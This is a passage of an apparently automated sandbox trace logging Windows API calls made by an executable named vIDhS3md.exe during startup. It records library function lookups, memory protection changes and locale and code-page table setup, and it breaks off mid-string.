0x74c7ed60 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0300.386] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0300.386] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0300.386] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0300.386] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0300.386] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0300.386] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0300.386] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0300.386] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0300.386] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0300.386] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0300.386] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0300.386] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0300.557] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0300.557] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0300.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0300.559] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0300.559] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0300.559] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0300.559] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0300.559] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0300.559] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0300.559] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0300.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x60a36495, dwHighDateTime=0x1d45ac6)) [0300.560] GetCurrentThreadId () returned 0xb28 [0300.560] GetCurrentProcessId () returned 0xb30 [0300.560] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34802224057) returned 1 [0300.560] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0300.560] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0300.561] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0300.562] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0300.563] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0300.563] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0300.563] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0300.563] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0300.563] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0300.563] GetCurrentThreadId () returned 0xb28 [0300.563] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7b28f5b6, hStdError=0x475810)) [0300.564] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0300.564] GetFileType (hFile=0x38) returned 0x2 [0300.564] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.564] GetFileType (hFile=0x3c) returned 0x2 [0300.564] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0300.564] GetFileType (hFile=0x40) returned 0x2 [0300.564] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0300.564] GetEnvironmentStringsW () returned 0x2d1e60* [0300.564] FreeEnvironmentStringsW (penv=0x2d1e60) returned 1 [0300.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.565] GetLastError () returned 0x0 [0300.565] SetLastError (dwErrCode=0x0) [0300.565] GetLastError () returned 0x0 [0300.565] SetLastError (dwErrCode=0x0) [0300.565] GetLastError () returned 0x0 [0300.565] SetLastError (dwErrCode=0x0) [0300.566] GetACP () returned 0x4e4 [0300.566] GetLastError () returned 0x0 [0300.566] SetLastError (dwErrCode=0x0) [0300.566] IsValidCodePage (CodePage=0x4e4) returned 1 [0300.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0300.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0300.566] GetLastError () returned 0x0 [0300.566] SetLastError (dwErrCode=0x0) [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.566] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0300.566] GetLastError () returned 0x0 [0300.566] SetLastError (dwErrCode=0x0) [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.566] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.566] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0300.566] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x26\xf4\x28\x7b\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.566] GetLastError () returned 0x0 [0300.566] SetLastError (dwErrCode=0x0) [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0300.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0300.566] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0300.566] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0300.566] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x